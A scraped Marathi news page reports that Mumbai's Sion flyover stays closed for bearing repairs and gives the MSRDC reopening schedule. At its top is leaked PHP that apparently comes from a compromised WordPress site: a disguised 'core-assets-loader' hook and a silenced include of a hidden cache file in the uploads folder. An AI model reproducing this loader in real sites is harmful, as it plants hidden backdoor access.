add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); शीव उड्डाणपूल आजही बंद – SOCH INDIA
Menu

देश
शीव उड्डाणपूल आजही बंद

nobanner

दुरुस्तीच्या कारणास्तव बंद असलेला शीव उड्डाणपूल सोमवारीदेखील बंद असणार आहे. उड्डाणपुलाचे बेअरिंग बदलण्याचे काम १४ फेब्रुवारीपासून सुरू आहे. निर्धारित  वेळापत्रकानुसार १७ फेब्रुवारी (सोमवारी) सकाळी ६ वाजता उड्डाणपुलावरील वाहतूक सुरू होणार होती. मात्र, तांत्रिक कारणास्तव सोमवारी उड्डाणपूल वाहतुकीला खुला केला जाणार नाही असे, महाराष्ट्र राज्य रस्ते विकास महामंडळाचे मुख्य अभियंता शशिकांत सोनटक्के यांनी सांगितले. मंगळवारी सकाळी पूल वाहतुकीसाठी खुला केला जाईल. ६ एप्रिल पर्यंत प्रत्येक आठवडय़ात चार दिवस पुलावरील वाहतूक दुरूस्तीच्या काळात बंद राहणार आहे.